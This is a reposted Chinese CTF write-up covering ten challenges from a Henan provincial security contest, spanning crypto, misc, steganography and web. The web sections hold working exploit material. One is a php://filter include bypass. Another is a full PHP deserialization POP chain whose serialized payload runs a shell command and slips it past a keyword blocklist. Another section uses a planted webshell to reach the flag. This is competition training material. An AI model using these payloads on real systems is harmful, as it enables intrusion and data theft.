河南省第五届“金盾信安杯”网络与数据安全大赛-WP

这篇具有很好参考价值的文章主要介绍了河南省第五届“金盾信安杯”网络与数据安全大赛-WP。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

师傅们,我太菜了,除了最后一个小时都还在前20名,结果最后一个小时被踢下去了,做了一道少解的题目也掩饰溃败,被打服了,直接被踢出前40名,babyrsa到底怎么解,呜呜!被打服了!!!!!!!以下是我们队伍的10道题目的wp。

题目一 Crypto-我看看谁还不会RSA

操作内容:

看到该题之后发现是私钥加密,公钥解密

脚本代码:

from Crypto.Util.number import *

c=8232151627233115772131180151146951323147507324390914513031444555762539986162650

p=8666789885346075954502743436174521501697

q=2449101960789395782044494299423558347143

n = p*q

phin = (p-1)*(q-1)

e=37777

m = pow(c,e,n)

print(long_to_bytes(m))

河南省第五届“金盾信安杯”网络与数据安全大赛-WP,android

flag值:

flag{r5a_Who_w0nt}

题目二 Misc-来都来了

操作内容:

打开压缩包发现有密码

用010工具打开发现是伪加密

河南省第五届“金盾信安杯”网络与数据安全大赛-WP,android

把09改为00,之后即可解压缩,压缩之后的内容为

河南省第五届“金盾信安杯”网络与数据安全大赛-WP,android

Base64解密之后把解密内容缩小

河南省第五届“金盾信安杯”网络与数据安全大赛-WP,android

flag值:

flag{cp2ae315-eef4-3fra-a768-cd9xb19cdk4e}

题目三 Cypto-hakiehs

操作内容:

通过图片形式打开,有3种类型的密码

河南省第五届“金盾信安杯”网络与数据安全大赛-WP,android

在网上查找到了3种密码对应的密码表

河南省第五届“金盾信安杯”网络与数据安全大赛-WP,android

河南省第五届“金盾信安杯”网络与数据安全大赛-WP,android

河南省第五届“金盾信安杯”网络与数据安全大赛-WP,android

对应密码表得到相应的字母是linkzeldadanon及为flag

flag值:

flag{linkzeldaganon}

题目四 Misc-Honor

操作内容:

foremost分离图片:foremost -T 图片

河南省第五届“金盾信安杯”网络与数据安全大赛-WP,android

河南省第五届“金盾信安杯”网络与数据安全大赛-WP,android

发现有一个jpg文件

用stegdetect分析存在隐写

河南省第五届“金盾信安杯”网络与数据安全大赛-WP,android

用stegseek使用rockyou输入命令爆破密码

河南省第五届“金盾信安杯”网络与数据安全大赛-WP,android

进行栅栏w型解密

河南省第五届“金盾信安杯”网络与数据安全大赛-WP,android

flag值:

flag{424c076e-768c-3636-acb5-4676900b9eec}

题目五 get_source

操作内容:

访问页面发现无内容,但通过返回包可发现php版本7.4.21

可利用Development Server源码泄露漏洞源码泄露漏洞

河南省第五届“金盾信安杯”网络与数据安全大赛-WP,android

得到源码后分析,md5和sha1可用数组绕过

post传参a[]=1&b[]=2&pwn[]=1 访问页面得到flag

河南省第五届“金盾信安杯”网络与数据安全大赛-WP,android

flag值:

动态flag不给了

题目六 Web-ApeCoin

操作内容:

页面无明显漏洞点 考虑源码泄露

访问/www.tar.gz发现源码泄露

在static/font目录下发现可疑文件.txt.php

打开后发现为冰蝎马

河南省第五届“金盾信安杯”网络与数据安全大赛-WP,android

根据特征解密得到链接密码74658263

冰蝎链接找到flag

河南省第五届“金盾信安杯”网络与数据安全大赛-WP,android

flag值:

flag{59366e97-4d45-4338-9056-4f06b0493df2}

题目七 Web-Easyphp

操作内容:

进入页面发现require_once文件包含

但flag.php已被包含过一次

用伪协议配合多级符号链接的办法进行绕过

php://filter/convert.base64-encode/resource=/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/usr/share/nginx/html/index.php

但是发现flag为假

河南省第五届“金盾信安杯”网络与数据安全大赛-WP,android

之后考虑包含页面出现的hint.php

发现该页面反序列化命令执行

源代码为

<?php

error_reporting(0);

class mouse

{

    public $rice;

    function __isset($n){

        $this->rice->nothing();

    }

}

class dog

{

    public $a;

    public $b;

    public $c;

    function __wakeup(){

        $this->a = 'chance?';

    }

    function __destruct(){

        $this->b = $this->c;

        die($this->a);

    }

}

class ct

{

    public $fish;

    function __toString()

    {

        if(isset($this->fish->d))

        {

            echo 'you wrong';

        }

    }

}

class get

{

    public $cmd;

    function __call($name,$no)

    {

        eval($this->cmd);

    }

}

$pop = $_GET['pop'];

if (!preg_match('/sys|pas|read|file|ls|cat|tac|head|tail|more|less|base|echo|cp|\$|\*|\+|\^|scan|current|chr|crypt|show_source|high|readgzfile|dirname|time|next|all|hex2bin|im|shell/i',$pop)){

    echo "you will get flag".'</br>';

    unserialize($pop);

}

else{

    die("Try again!");

}

分析反序化链

从 dog->ct->mouse->get构造 payload 绕过正则

编写反序列化脚本

<?php

class mouse

{

    public $rice;

    function __construct()

    {

        $this->rice = new get;

    }

}

class dog

{

    public $a;

    public $b;

    public $c;

    function __construct()

    {

        $this->a = 'chance?';

        $this->b = &$this->a;

        $this->c = new ct;

    }

}

class ct

{

    public $fish;

    function __construct()

    {

        $this->fish = new mouse;

    }

}

class get

{

    public $cmd;

    function __construct()

    {

        $this->cmd = 'print(`c\at /realflag/you_want_flag.php`);';

    }

}

print_r(serialize(new dog));

运行得到

O:3:"dog":3:{s:1:"a";s:7:"chance?";s:1:"b";R:2;s:1:"c";O:2:"ct":1:{s:4:"fish";O:5:"mouse":1:{s:4:"rice";O:3:"get":1:{s:3:"cmd";s:42:"print(`c\at /realflag/you_want_flag.php`);";}}}}

传参后f12得到flag

河南省第五届“金盾信安杯”网络与数据安全大赛-WP,android

flag值:

动态flag,不给了

题目八 ezupload

操作内容:

爆破目录发现/flag目录下有内容

访问发现为flag

河南省第五届“金盾信安杯”网络与数据安全大赛-WP,android

flag值:

flag{4a384594-7550-4544-b256-66d18640a478}

题目九 Crypto-font

操作内容:脑洞一套炸了

打开图片详细信息

河南省第五届“金盾信安杯”网络与数据安全大赛-WP,android

◎☀◐♬¤☾♀☹☽§♪℗♩☑♪®♂¤☒♫〼♪۞◐§◎☀◐◑☼♭©☺♪√

☑◑☼√♬◎〼©♂☑√۞☽♩☺☀☑◑☀√☑♩☒♂☑☀☹♪

通过在浏览器上发现了一句英文串描述该图片

河南省第五届“金盾信安杯”网络与数据安全大赛-WP,android

theQuickbrownfoxjumpsoverthelazydog,

发现与◎☀◐♬¤☾♀☹☽§♪℗♩☑♪®♂¤☒♫〼♪۞◐§◎☀◐◑☼♭©☺♪√一一对应正好36个

字母表为

√:g;♪:0;☺  d;©  y;♭  z;☼  a;◑  l;◐ e;☀ h;◎  t;§  r;◐  e;۞  v;♪  o;〼  s;♫ p;☒  m;¤  u;♂  j;® x;♪ o;☑  f;♩  n;℗  w;♪ o;§  r;☽  b;☹  k;♀  c;☾  i;¤ u;♬ q;◐  e;☀ h;◎  t

根据☑◑☼√♬◎〼©♂☑√۞☽♩☺☀☑◑☀√☑♩☒♂☑☀☹♪一一对应到字母表上

是qtsyjfgvbndhflhgfnmjfhko就是flag

flag值:

flag{qtsyjfgvbndhflhgfnmjfhko}

题目十 Misc-芙宁娜

操作内容:

某电信原题,最后8e8f,不好多说,之前的wp也可水

'ZmxhZ3tiYzgzOTRhYS03ZTMyLTQ3ZTgtYTlmZC0xYmY2ODNhZg=='

河南省第五届“金盾信安杯”网络与数据安全大赛-WP,android

河南省第五届“金盾信安杯”网络与数据安全大赛-WP,android

flag{bc8394aa-7e32-47e8-a9fd-1bf683af

通过ps的元数据可以得到被遮盖的16进制编码,通过重组还原得到⼀个pyc⽂ 件,pyc隐写得到8e8f} 

拼接可得flag

第二种方法:

爆破找几个慢慢提交,反正没有提交限制,就是流量大,比赛时候,真的只有这个方法最实用

import string

chars = string.ascii_lowercase + string.digits
flag = "flag{bc8394aa-7e32-47e8-a9fd-1bf683af"

with open(r"C:\Users\Administrator\Desktop\23.txt", "w") as file:
    for a in chars:
        for b in chars:
            for c in chars:
                for d in chars:
                    current_flag = flag + a + b + c + d + "}"
                    file.write(current_flag + "\n")

print("结果已保存在桌面上")

爆破脚本附上!

flag值:

flag{bc8394aa-7e32-47e8-a9fd-1bf683af8e8f}文章来源地址https://www.toymoban.com/news/detail-758380.html

到了这里,关于河南省第五届“金盾信安杯”网络与数据安全大赛-WP的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 【河南省第二届技能大赛-物联网技术】C模块Python开发讲解

    这是基于样题进行讲解的文章,因为正式赛题尚未公布和样题类型相似。文章结尾提供了源码和环境链接,读者可以自行下载以进行更深入的学习和优化。 注意:题目中的API链接,是在比赛局域网环境下进行的,在平常练习的时候,用新大陆官方链接即可! 链接:新大陆官

    2024年02月01日
    浏览(65)
  • 【附源码】基于flask框架基于微信小程序的河南省美食分享平台 后台(python+mysql+论文)

    本系统(程序+源码)带文档lw万字以上   文末可获取本课题的源码和程序 选题背景: 随着移动互联网的飞速发展,微信小程序以其无需下载安装、使用方便的特点,逐渐成为人们日常生活中获取信息和进行交流的重要工具。特别是在美食分享领域,人们对各地特色美食的了

    2024年04月27日
    浏览(44)
  • 第五届传智杯-初赛【B组-题解】

    在宇宙射线的轰击下,莲子电脑里的一些她自己预定义的函数被损坏了。 对于一名理科生来说,各种软件在学习和研究中是非常重要的。为了尽快恢复她电脑上的软件的正常使用,她需要尽快地重新编写这么一些函数。 你只需输出fun(a,b) 的值。 共一行两个整数 a,b。 共一行

    2024年02月05日
    浏览(33)
  • HNUCM信息科学与工程学院第五届大学生程序设计竞赛——正式赛

    签到题 简单dp,取前面第五天的3倍就行 这题被封了不记得什么题了 枚举然后判断回文就行了 简单dp,不能跳的位置置0 算是一个简单思维题吧,先考虑偶奇依次排列,然后发现可能会剩下偶数或者奇数。 如果剩下的是偶数,因为偶数不会影响前面的奇偶性,所以在末尾首先

    2024年02月08日
    浏览(47)
  • 【IEEE会议】第五届信息与计算机前沿技术国际学术会议(ICFTIC 2023)

    第五届信息与计算机前沿技术国际学术会议(ICFTIC 2023) 2023 5th International Conference on Frontiers Technology of Information and Computer  第五届信息与计算机前沿技术国际学术会议(ICFTIC 2023)将在中国青岛举行, 会期是2023年11月17-19日, 为期三天, 本次会议是由中国石油大学(华东)主办,

    2024年02月10日
    浏览(54)
  • 第五届湖北省大学生程序设计竞赛(HBCPC 2023)vp赛后补题

    思路: 数位dp,如果我们暴力的计算的状态的话,显然就是记录每个数字出现几次。但是显然这样难以发挥数位dp的记忆化功效,因为只有出现次数相同,你是什么数字,实际是无所谓的。所以我们尝试记录每个出现次数有多少个数字 尝试打表发现,结果只有1477种 所以,对

    2024年02月07日
    浏览(44)
  • TPU编程竞赛|Stable Diffusion大模型巅峰对决,第五届全球校园人工智能算法精英赛正式启动!

    目录 赛题介绍 赛题背景 赛题任务 赛程安排 评分机制 奖项设置         近日,2023第五届全球校园人工智能算法精英赛正式开启报名。作为赛题合作方,算丰承办了“算法专项赛”赛道,提供赛题 「面向Stable Diffusion的图像提示语优化」 ,同时为参赛选手提供了丰富的云

    2024年02月08日
    浏览(61)
  • 通付盾受邀出席区块链技术和应用峰会暨第五届中国区块链开发大赛成果发布会及颁奖仪式

    由江苏省工业和信息化厅、中国电子技术标准化研究院联合举办的“标准引领、创新驱动”第五届中国区块链开发大赛成果发布会在苏州隆重召开。 通付盾受邀参与此次盛会, 【基于区块链的“数信云”安全应用与服务平台】获得“江苏省区块链产业发展试点示范项目”荣

    2024年02月16日
    浏览(54)
  • 金盾加密视频破解翻录限制工具使用教程

    最近在研究金盾的加密视频。想用录屏软件录制为mp4格式的视频。方便在别的机器观看。 发现一旦打开金盾的播放器。然后再打开录屏工具就会被检测。然后录屏工具会强制关闭。 所以我研发了一款工具,可以直接破解播放器检测录屏工具。然后就可以快乐的翻录了。  下

    2024年02月13日
    浏览(306)
  • 金盾2016(正阳版)播放器机器码替换

    参考链接:金盾2016加密视频替换机器码实现多机播放_哔哩哔哩_bilibili 详解金盾2016替换机器码的几个关键步骤_fruits360的博客-CSDN博客_替换机器码 之前学习下载的视频,采用金盾加密,有机器码和播放密码,但是可能因为重装系统导致机器码变了,原来播放密码无法播放,通

    2023年04月09日
    浏览(132)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包